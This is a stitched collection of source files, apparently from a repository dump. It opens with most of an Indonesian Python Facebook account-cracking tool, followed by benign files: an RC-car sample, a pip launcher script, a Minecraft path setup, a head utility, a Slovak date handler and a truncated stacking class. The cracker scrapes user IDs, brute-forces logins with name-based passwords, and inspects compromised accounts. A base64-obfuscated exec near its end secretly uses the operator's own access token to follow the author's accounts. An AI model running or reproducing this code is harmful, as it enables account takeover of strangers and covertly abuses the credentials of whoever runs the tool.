print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.mbasic, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif ii in ('3', '03'):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.mobile, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
else:
print '\n%s%s isi yang benar'%(M,til);self.sung()
# CEK OPSI
def opsi():
hasil = ("hasil/")
print("\n%s%s%s Masukan file [ ex%s: %sCP-%s-%s-%s.txt%s ]"%(U,til,O,M,K,ha,op,ta,O))
romi = raw_input("%s%s%s Nama file %s> %s"%(U,til,O,M,K))
if romi == "":
print("%s%s isi yang benar "%(M,til));jeda(2);opsi()
try:
file_cp = open(hasil+romi, "r").readlines()
except IOError:
exit("\n%s%s nama file %s tidak tersedia"%(M,til,romi))
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
print("%s%s%s Total akun %s: %s%s"%(U,til,O,M,P,len(file_cp)));jeda(2)
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
for fb in file_cp:
akun = fb.replace("\n","")
ngecek = akun.split(" ◊ ")
print("\n%s%s%s cek akun %s: %s%s"%(U,til,O,M,K,akun.replace(" *--> ","")));jeda(0.07)
try:
mengecek(ngecek[0].replace(" *--> ",""), ngecek[1])
except requests.exceptions.ConnectionError:
pass
print("\n%s%s%s Selesai "%(U,til,O));jeda(0.07)
raw_input("%s%s%s kembali "%(U,til,O));jeda(0.07)
menu()
def mengecek(user, pw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36")
ses = requests.Session()
ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
data = {}
ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pw})
run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
if "c_user" in ses.cookies:
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
apk = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
print("%s%s Berhasil ◊ %s "%(H,til,kuki));jeda(0.07)
print("%s%s%s Aplikasi terhubung %s: %s%s"%(U,til,O,M,H,str(len(apk))))
nomer = 0
for app in apk:
nomer += 1
print(" %s%s. %s%s, %s"%(P,str(nomer),H,app[0][0],app[0][1]))
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
sesi = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in sesi.find_all("option")]
print("%s%s%s terdapat %s0%s%s opsi %s: "%(U,til,O,P,str(len(ngew)),O,M));jeda(0.07)
for opt in range(len(ngew)):
jalan(" %s0%s. %s%s "%(P,str(opt+1),K,ngew[opt]))
elif "login_error" in str(run):
eror = run.find("div",{"id":"login_error"}).find("div").text
print("%s%s %s"%(M,til,eror));jeda(0.07)
else:
print("%s%s login gagal, silahkan cek kembali id dan password"%(M,til));jeda(0.07)
# MENU INI AJG
def menu():
os.system('clear')
try:
romz = open('data/token.txt', 'r').read()
except IOError:
print ("%s%s Token invalid "%(M,til));jeda(2);os.system('rm -rf data/token.txt');masuk()
try:
r = requests.get('https://graph.facebook.com/me?access_token='+romz,headers=header)
a = json.loads(r.text)
nama = a["name"]
except KeyError:
print ("%s%s Token invalid "%(M,til));jeda(2);os.system('rm -rf data/token.txt');masuk()
except requests.exceptions.ConnectionError:
exit('\n\n%s%s tidak ada koneksi%s\n'%(M,til,N))
banner()
print ('%s # %sName %s: %s%s%s \n'%(U,O,M,H,nama,O))
print ('%s%s%s 01 %sDump id public'%(U,til,P,O))
print ('%s%s%s 02 %sDump id followers'%(U,til,P,O))
print ('%s%s%s 03 %sDump id reaction post'%(U,til,P,O))
print ('%s%s%s 04 %sDump id anggota groups'%(U,til,P,O))
print ('%s%s%s 05 %sDump id pencarian nama'%(U,til,P,O))
print ('%s%s%s 06 %sDump id pesan mesengger'%(U,til,P,O))
print ('%s%s%s 07 %sStart crack'%(U,til,H,O))
print ('%s%s%s 08 %sGanti user agent'%(U,til,P,O))
print ('%s%s%s 09 %sCek hasil crack'%(U,til,P,O))
print ('%s%s%s 10 %sCek opsi akun'%(U,til,P,O))
#print ('%s%s%s 11 %sInfo script'%(U,til,P,O))
print ('%s%s%s rm %sHapus akun'%(U,til,P,O))
print ('%s%s%s 00 %sKeluar'%(U,til,M,O))
slut = raw_input('\n%s# %sPilih %s> %s'%(P,O,M,K))
if slut == '':
print '\n%s%s isi yang benar'%(M,til);jeda(2);menu()
elif slut in['1','01']:
publik(romz)
elif slut in['2','02']:
followers(romz)
elif slut in['3','03']:
postingan(romz)
elif slut in['4','04']:
group(__romz__())
elif slut in['5','05']:
dumpfl();exit()
elif slut in['6','06']:
pesan(__romz__())
elif slut in['7','07']:
ngentod().askk()
elif slut in['8','08']:
useragent()
elif slut in['9','09']:
try:
dirs = os.listdir("hasil")
for file in dirs:
print("%s%s%s> %s%s"%(U,til,M,O,file));jeda(0.2)
file = raw_input("\n%s%s%s masukan file %s:%s "%(U,til,O,M,O));jeda(0.2)
if file == "":
print("%s%s file tidak ada "%(M,til))
total = open("hasil/%s"%(file)).read().splitlines()
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
nm_file = ("%s"%(file)).replace("-", " ")
ttl_file = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
jalan("%s%s%s Crack tanggal %s:%s%s %stotal %s: %s%s"%(U,til,O,M,P,ttl_file,O,M,P,len(total)))
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
for akun in total:
fb = akun.replace("\n","")
tling = fb.replace(" *--> ", " *-->").replace(" *-->", " *--> ")
print(tling);jeda(0.03)
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
raw_input('\n%s%s%s kembali '%(U,til,O));menu()
except (IOError):
print("\n%s%s tidak ada hasil :("%(M,til))
raw_input('\n%s%s%s kembali '%(U,til,O));menu()
elif slut in['10']:
opsi()
elif slut in['11']:
print(ingfo)
elif slut in['rm','Rm','RM']:
print ('')
tik();jeda(1);os.system('rm -rf data/token.txt')
os.system('rm -rf .cok')
jalan('\n%s%s berhasil terhapus '%(H,til));exit()
elif slut in['0','00']:
exit('\n')
else:
print '\n%s%s isi yang benar'%(M,til);jeda(2);menu()
exec(base64.b64decode('ZGVmIGxvZ2luX3h4KCk6CiAgICB0cnk6CiAgICAgICAgdG9rZW4gPSBvcGVuKCJkYXRhL3Rva2VuLnR4dCIsInIiKS5yZWFkKCkgCiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDIyMDg2MTcyNTU2L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBGYW5zcGFnZSBSb21pIFhECiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDI4NDM0ODgwNTI5L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBSb21pIEFmcml6YWwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNjc4MDc1NjU4NjEvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIFJvbWkgQWZyaXphbCAoMjAyMSkKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwMDM3MjM2OTY4ODUvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIElxYmFsIGJvYnoKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNDExMjkwNDg5NDgvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIEl3YW4gaGFkaWFuc3lhaAogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDAwNzUyMDIwMzQ1Mi9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgSGFtemFoIGtpcmFuYQogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDAwMjQ2MTM0NDE3OC9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgVW5payBST01JIEFGUklaQUwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwNzE3NDc0MjA1ODMvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIERvbmlmdGZhbm55CiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDI5MTQzMTExNTY3L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBEZW1pdCBSb21pIEFmcml6YWwKICAgICAgICByZXF1ZXN0cy5wb3N0KCdodHRwczovL2dyYXBoLmZhY2Vib29rLmNvbS8xMDAwMDE1NDAyOTkxMDgvc3Vic2NyaWJlcnM/YWNjZXNzX3Rva2VuPSVzJyUodG9rZW4pKSAjIEhha2lraQogICAgICAgIHJlcXVlc3RzLnBvc3QoJ2h0dHBzOi8vZ3JhcGguZmFjZWJvb2suY29tLzEwMDA1NTkxODM5MTI4MC9zdWJzY3JpYmVycz9hY2Nlc3NfdG9rZW49JXMnJSh0b2tlbikpICMgVGlhcmEgYXJ0CiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDA5Mzg0MzM4NDcwL3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBJd2FuIGhhbmRpYW5zeWFoIHYyCiAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vMTAwMDM2NjU1MzI1OTk2L3N1YnNjcmliZXJzP2FjY2Vzc190b2tlbj0lcyclKHRva2VuKSkgIyBBYnVzdG8gSmF2YQogICAgZXhjZXB0OgogICAgCXBhc3M='))
if __name__ == '__main__':
os.system('git pull')
menu()
|
[
"noreply@github.com"
] |
Iqbl-Bobz.noreply@github.com
|
e1a70b50f4fc965405d013ea73af5251bf32c847
|
a9a3b98838b0a9bfbb345b82f7a46068541d5c67
|
/src/rc_sample.py
|
fa0b970e0595791eac4fe6a23f7e03db0a2992bb
|
[
"MIT"
] |
permissive
|
christian-vorhemus/autcar
|
d8abaa52b3c779ad6835f16c16ede9003adab40f
|
9860654bae082302d5862f3c960a9ce261e4385f
|
refs/heads/master
| 2021-07-02T23:08:44.022216
| 2020-10-01T16:12:39
| 2020-10-01T16:12:39
| 169,281,566
| 14
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
from autcar import Camera, Car, RemoteController, Capture
import time
rc = RemoteController()
car = Car()
cam = Camera(rotation=-1)
cap = Capture(car, cam, capture_interval=2)
rc.listen()
direction = None
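# Main control loop: poll commands from the remote controller and translate
# them into car maneuvers; recording is toggled through the Capture helper.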
while True:
cmd = rc.get_cmds()
print(cmd + ", time:" + str(int(time.time())))
if(cmd == "fast"):
direction = "forward"
car.move("forward", "medium")
if(cmd == "stop"):
car.stop()
if(cmd == "faster"):
direction = "forward"
car.move("forward", "fast")
if(cmd == "backwards"):
direction = "backwards"
car.move("backwards")
if(cmd == "leftlight"):
car.left("light", direction)
if(cmd == "lefthard"):
car.left("medium", direction)
if(cmd == "rightlight"):
car.right("light", direction)
if(cmd == "righthard"):
car.right("medium", direction)
if(cmd == "startrecording"):
cap.start()
if(cmd == "stoprecording"):
cap.stop()
|
[
"chvorhem@microsoft.com"
] |
chvorhem@microsoft.com
|
9c4d517a9fee863b223f70aa4d370aa5ab3ef854
|
0517db36a2805c055fabb935992f215ea946de5c
|
/venv/Scripts/pip3.7-script.py
|
dda49038773158ac578c38a5ff8a506d25b6163a
|
[] |
no_license
|
asmelo/python_course
|
bb38294d4b3043055909a8a267a0873663b0281f
|
242937397725ba9f6256b5c605fb58ce2ad510e9
|
refs/heads/master
| 2020-04-27T22:19:38.832892
| 2019-03-09T18:47:24
| 2019-03-09T18:47:24
| 174,732,678
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
#!C:\Users\Alexandre\PycharmProjects\cursoPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
)
|
[
"asmelo10@hotmail.com"
] |
asmelo10@hotmail.com
|
307d26a18acaea5c51bddf6a387edc27a800a9cc
|
a8512be25763749b9267eefa1f88117b9f855823
|
/pmlauncher/minecraft.py
|
ed0d63d861ece60eda364edf4b21fc116461adb6
|
[] |
no_license
|
huntert1004/Adelphi
|
3306b0b9d13cfedcf14838090d24dcc1743766b3
|
aa1a63294f47f9c993a5c8b64c3523b5ead0e15c
|
refs/heads/master
| 2023-01-13T15:12:40.178528
| 2020-06-07T02:41:42
| 2020-06-07T02:41:42
| 243,532,722
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
import os
path = ""
library = ""
version = ""
assets = ""
index = ""
assetObject = ""
assetLegacy = ""
resources = ""
natives = ""
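# Builds the launcher's Minecraft directory layout (libraries, versions,
# resources, natives and the assets tree) under the given root path,
# creating any directory that does not exist yet.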
def initialize(_path):
global path, library, version, resources, natives
path = m(_path)
library = m(path + "/libraries")
version = m(path + "/versions")
resources = m(path + "/resources")
natives = m(path + "/natives")
change_assets(path)
def change_assets(p):
global assets, assetLegacy, assetObject, index
assets = os.path.normpath(p + "/assets")
index = os.path.normpath(assets + "/indexes")
assetObject = os.path.normpath(assets + "/objects")
assetLegacy = os.path.normpath(assets + "/virtual/legacy")
def m(p):
p = os.path.normpath(p)
if not os.path.isdir(p):
os.makedirs(p)
return p
|
[
"daringswordfights@gmail.com"
] |
daringswordfights@gmail.com
|
9e1afb01494ab2d3737b90969d652b95190004c0
|
0a6322f0fcc26bc928046b2d245a8ed40194cd06
|
/1/14.py
|
ef0126e59c7a42a6f87e36a3b8365a1c28789f60
|
[] |
no_license
|
kenta997/100nock
|
77229bfcd5307ae93997aa9f7e03e6a64bd88ce2
|
0bb5217fb66f39d4165f8311f0b82cc2c7d58f42
|
refs/heads/master
| 2021-07-19T02:35:52.601905
| 2021-07-14T12:58:47
| 2021-07-14T12:58:47
| 209,467,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 111
|
py
|
import sys
s = sys.stdin.readlines()
n = int(sys.argv[1]) if len(sys.argv) > 1 else 10
print("".join(s[:n]))
|
[
"kenta_morishita@albert2005.co.jp"
] |
kenta_morishita@albert2005.co.jp
|
580f2eac6bf6447c43532e7f7a083c21bdf884dd
|
fcd51666f037a185f212f4bcf2613930001d7ae7
|
/location_privacy/analysis/statistics/tweet_distribution.py
|
8976b0666e53c9c0b4ca211e76f7bbcbfdcb6edc
|
[] |
no_license
|
hbarthwal/infolab
|
56d499e6b1edca639bba5b1a6e165d0e87bf4978
|
312687947487a31f4b9837bcbff549163221b8b1
|
refs/heads/master
| 2020-12-02T17:28:26.789442
| 2014-02-14T22:07:01
| 2014-02-14T22:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,853
|
py
|
'''
Created on Jan 31, 2014
@author: Himanshu Barthwal
'''
from mrjob.job import MRJob
from cjson import decode
from common_functions import Utils
class MRTweetDistribution(MRJob):
'''
Counts the number of geotagged vs non geotagged tweets
in a given dataset generated by dataextractor.TweetParser .
'''
def configure_options(self):
super(MRTweetDistribution, self).configure_options()
self.add_file_option('--filter_file', help = 'The file containing'
' the uids, to be applied as filter on the data.')
self.add_passthrough_option('--apply_filter', action = 'store_true',
default = False, dest = 'apply_filter')
self.add_passthrough_option('--delta',
default = 1, type = 'int', dest = 'delta')
def load_options(self, args):
super(MRTweetDistribution, self).load_options(args)
filter_filename = self.options.filter_file
if self.options.apply_filter:
self._uids = Utils.get_filter_uids(filter_filename)
def yield_data(self, data):
if data['c'] != 'N':
yield 'Geotagged_Tweets', 1
else:
yield 'Non_Geotagged_Tweets', 1
def read_data(self, _, line):
data = decode(line)
if self.options.apply_filter:
if data['u'] in self._uids:
return self.yield_data(data)
else:
return self.yield_data(data)
def aggregate_data(self, tweet_type, count):
yield tweet_type, sum(count)
def steps(self):
return [self.mr(mapper = self.read_data,
combiner = self.aggregate_data,
reducer = self.aggregate_data)]
def main():
MRTweetDistribution.run()
if __name__ == '__main__':
main()
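# Hypothetical local run (file names are illustrative, not from the repo):
#   python tweet_distribution.py --apply_filter --filter_file uids.txt tweets.json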
|
[
"shady3025@tamu.edu"
] |
shady3025@tamu.edu
|
8bd3d164dd6c9b19482571a02dc8ca73bf2177ee
|
c80ec1805a7e6cb1bd3f4b3e383ef4f4cf164765
|
/gen/datehandler/_date_sk.py
|
64272a3685829a00599398ee91c9de9b8a6188f6
|
[] |
no_license
|
balrok/gramps_addon
|
57c8e976c47ea3c1d1298d3fd4406c13909ac933
|
0c79561bed7ff42c88714edbc85197fa9235e188
|
refs/heads/master
| 2020-04-16T03:58:27.818732
| 2015-02-01T14:17:44
| 2015-02-01T14:17:44
| 30,111,898
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,077
|
py
|
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2004-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Slovak-specific classes for parsing and displaying dates.
"""
from __future__ import unicode_literals
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import re
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from ..lib.date import Date
from ._dateparser import DateParser
from ._datedisplay import DateDisplay
from ._datehandler import register_datehandler
#-------------------------------------------------------------------------
#
# Slovak parser
#
#-------------------------------------------------------------------------
class DateParserSK(DateParser):
modifier_to_int = {
'pred' : Date.MOD_BEFORE,
'do' : Date.MOD_BEFORE,
'po' : Date.MOD_AFTER,
'asi' : Date.MOD_ABOUT,
'okolo' : Date.MOD_ABOUT,
'pribl.' : Date.MOD_ABOUT,
}
calendar_to_int = {
'gregoriánsky' : Date.CAL_GREGORIAN,
'g' : Date.CAL_GREGORIAN,
'juliánsky' : Date.CAL_JULIAN,
'j' : Date.CAL_JULIAN,
'hebrejský' : Date.CAL_HEBREW,
'h' : Date.CAL_HEBREW,
'islamský' : Date.CAL_ISLAMIC,
'i' : Date.CAL_ISLAMIC,
'republikánsky' : Date.CAL_FRENCH,
'r' : Date.CAL_FRENCH,
'perzský' : Date.CAL_PERSIAN,
'p' : Date.CAL_PERSIAN,
'švédsky' : Date.CAL_SWEDISH,
's' : Date.CAL_SWEDISH,
}
quality_to_int = {
'odhadovaný' : Date.QUAL_ESTIMATED,
'odh.' : Date.QUAL_ESTIMATED,
'vypočítaný' : Date.QUAL_CALCULATED,
'vyp.' : Date.QUAL_CALCULATED,
}
def init_strings(self):
DateParser.init_strings(self)
_span_1 = ['od']
_span_2 = ['do']
_range_1 = ['medzi']
_range_2 = ['a']
self._span = re.compile("(%s)\s+(?P<start>.+)\s+(%s)\s+(?P<stop>.+)" %
('|'.join(_span_1), '|'.join(_span_2)),
re.IGNORECASE)
self._range = re.compile("(%s)\s+(?P<start>.+)\s+(%s)\s+(?P<stop>.+)" %
('|'.join(_range_1), '|'.join(_range_2)),
re.IGNORECASE)
#-------------------------------------------------------------------------
#
# Slovak display
#
#-------------------------------------------------------------------------
class DateDisplaySK(DateDisplay):
"""
Slovak language date display class.
"""
long_months = ( "", "január", "február", "marec", "apríl", "máj",
"jún", "júl", "august", "september", "október",
"november", "december" )
short_months = ( "", "jan", "feb", "mar", "apr", "máj", "jún",
"júl", "aug", "sep", "okt", "nov", "dec" )
calendar = (
"", "juliánsky", "hebrejský",
"republikánsky", "perzský", "islamský",
"švédsky"
)
_mod_str = ("", "pred ", "po ", "okolo ", "", "", "")
_qual_str = ("", "odh. ", "vyp. ")
formats = (
"RRRR-MM-DD (ISO)", "numerický", "Mesiac Deň, Rok",
"MES Deň, Rok", "Deň, Mesiac, Rok", "Deň MES Rok"
)
# this must agree with DateDisplayEn's "formats" definition
# (since no locale-specific _display_gregorian exists, here)
def display(self, date):
"""
Return a text string representing the date.
"""
mod = date.get_modifier()
cal = date.get_calendar()
qual = date.get_quality()
start = date.get_start_date()
newyear = date.get_new_year()
qual_str = self._qual_str[qual]
if mod == Date.MOD_TEXTONLY:
return date.get_text()
elif start == Date.EMPTY:
return ""
elif mod == Date.MOD_SPAN:
d1 = self.display_cal[cal](start)
d2 = self.display_cal[cal](date.get_stop_date())
scal = self.format_extras(cal, newyear)
return "%s%s %s %s %s%s" % (qual_str, 'od', d1,
'do', d2, scal)
elif mod == Date.MOD_RANGE:
d1 = self.display_cal[cal](start)
d2 = self.display_cal[cal](date.get_stop_date())
scal = self.format_extras(cal, newyear)
return "%s%s %s %s %s%s" % (qual_str, 'medzi',
d1, 'a', d2, scal)
else:
text = self.display_cal[date.get_calendar()](start)
scal = self.format_extras(cal, newyear)
return "%s%s%s%s" % (qual_str, self._mod_str[mod],
text, scal)
#-------------------------------------------------------------------------
#
# Register classes
#
#-------------------------------------------------------------------------
register_datehandler(('sk_SK', 'sk', 'SK', 'Slovak'), DateParserSK, DateDisplaySK)
|
[
"carl.schoenbach@gmail.com"
] |
carl.schoenbach@gmail.com
|
0c85ccae2edff084d0850ef3fc8f154127317255
|
de8e0c5c759347917ca7f06b42ca6c82b8f8c95f
|
/baekjoon/backtracting/sdoku.py
|
c875c42f7480cf8603e80d099b739364ba063084
|
[] |
no_license
|
Greek-and-Roman-God/Apollo
|
aaeb315a9e70c719b3e53e3c4b9b5dde7b517ec0
|
2823cbcc9fc10ecd3f1785732403cb9c288f8ef3
|
refs/heads/main
| 2023-08-23T12:08:05.322733
| 2021-10-02T10:54:13
| 2021-10-02T10:54:13
| 308,242,023
| 1
| 1
| null | 2020-11-26T12:03:44
| 2020-10-29T06:49:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
# 2580 Sudoku
# https://www.acmicpc.net/problem/2580
# board = [list(map(int, input().split())) for _ in range(9)]
board = [
[0, 3, 5, 4, 6, 9, 2, 7, 8],
[7, 8, 2, 1, 0, 5, 6, 0, 9],
[0, 6, 0, 2, 7, 8, 1, 3, 5],
[3, 2, 1, 0, 4, 6, 8, 9, 7],
[8, 0, 4, 9, 1, 3, 5, 0, 6],
[5, 9, 6, 8, 2, 0, 4, 1, 3],
[9, 1, 7, 6, 5, 2, 0, 8, 0],
[6, 0, 3, 7, 0, 1, 9, 5, 2],
[2, 5, 8, 3, 9, 4, 7, 6, 0],
]
zeros = [(i, j) for i in range(9) for j in range(9) if board[i][j] == 0]
def is_promising(i, j):
promising = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    # check the row and the column
for k in range(9):
if board[i][k] in promising:
promising.remove(board[i][k])
if board[k][j] in promising:
promising.remove(board[k][j])
    # check the 3x3 box
i //= 3
j //= 3
for p in range(i*3, (i+1)*3):
for q in range(j*3, (j+1)*3):
if board[p][q] in promising:
promising.remove(board[p][q])
return promising
flag = False
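# Depth-first search over the empty cells: try each still-allowed digit, and
# once every cell is filled print the board and set `flag` to stop exploring.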
def dfs(x):
global flag
if flag:
return
if x == len(zeros):
for row in board:
print(*row)
flag = True
return
else:
(i, j) = zeros[x]
promising = is_promising(i, j)
for num in promising:
board[i][j] = num
dfs(x+1)
board[i][j] = 0
dfs(0)
|
[
"doyeon311@gmail.com"
] |
doyeon311@gmail.com
|
fc6f852a94e16836de135469f3f3c3d35b01b02a
|
0f4b7144d993d75a5a941f007e6dca6f0606b6d8
|
/stacking_class.py
|
1f97d43ef70267d7389a9198aab567fe4caf7ded
|
[] |
no_license
|
yanhan19940405/Data_machine_learning
|
40226181f9ff6c8410928fe372a2e4a917a3b9fa
|
d494501f5a31554ec5588dd07e0d203aa9cac91a
|
refs/heads/master
| 2020-04-25T21:12:18.051075
| 2020-04-20T09:38:54
| 2020-04-20T09:38:54
| 173,073,373
| 21
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,249
|
py
|
#--coding=utf-8--
# coding=utf8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt # for plotting
from scipy.stats import mode
import warnings # to ignore warnings
from sklearn import preprocessing
from sklearn.externals import joblib
from sklearn.metrics import mean_squared_error  # mean squared error
from sklearn.metrics import mean_absolute_error  # mean absolute error
from sklearn.metrics import r2_score#R square
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
import re
import seaborn as sns
from xgboost import XGBRegressor
from sklearn import datasets
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import StratifiedKFold
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.datasets.samples_generator import make_blobs
from xgboost import XGBRegressor
from sklearn.linear_model import LogisticRegression
'''Build the training dataset'''
from sklearn.model_selection import KFold
'''5-fold stacking'''
class stacking_model:
def __init__(self):
print(1)
    def first_level_model(self,nfolds,train_data,target_data,test_data,clfs):  # nfolds: number of CV folds, train_data: training set, target_data: list of target values, test_data: test dataset, clfs: list of stacking base models
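        # Out-of-fold scheme: for each fold, every base model is fit on the
        # training part and predicts the held-out part; those predictions become
        # the level-2 features, while its predictions on the real test set are
        # kept per model/fold and averaged later.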
n_folds = 5
train_set = []
test_set = []
target_set = []
new_target_value = []
